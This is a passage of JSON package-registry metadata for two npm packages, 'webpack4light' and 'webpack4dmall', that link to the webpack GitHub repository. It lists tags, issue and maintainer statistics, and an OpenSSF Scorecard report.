,"kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T14:11:02.217Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":38.79100384105411,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.078793134549431,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":20.27905278517529},"purl":"pkg:npm/webpack4light","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack4light","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack4light","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack4light/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T17:00:12.153Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":896,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359731.32045779686,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":699,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.657366071428571,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":136,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4light/codemeta","maintainers":[{"uuid":"hslight","login":"hslight","name":null,"email":"light01@z.witu.win","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~hslight","role":null,"created_at":"2022-11-15T10:40:50.549Z","updated_at":"2022-11-15T10:40:50.549Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/hslight/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2569026,"name":"webpack4dmall","ecosystem":"npm","description":"多点的webpack","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2019-10-30T11:38:44.778Z","latest_release_published_at":"2019-10-30T11:38:44.778Z","latest_release_number":"1.0.0","last_synced_at":"2026-09-02T02:40:41.371Z","created_at":"2022-04-10T03:39:33.167Z","updated_at":"2026-09-02T02:40:41.371Z","registry_url":"https://www.npmjs.com/package/webpack4dmall","install_command":"npm install webpack4dmall","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-15T12:07:17.000Z","size":95092,"stargazers_count":65979,"open_issues_count":146,"forks_count":9532,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.192Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-15T11:34:15.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using 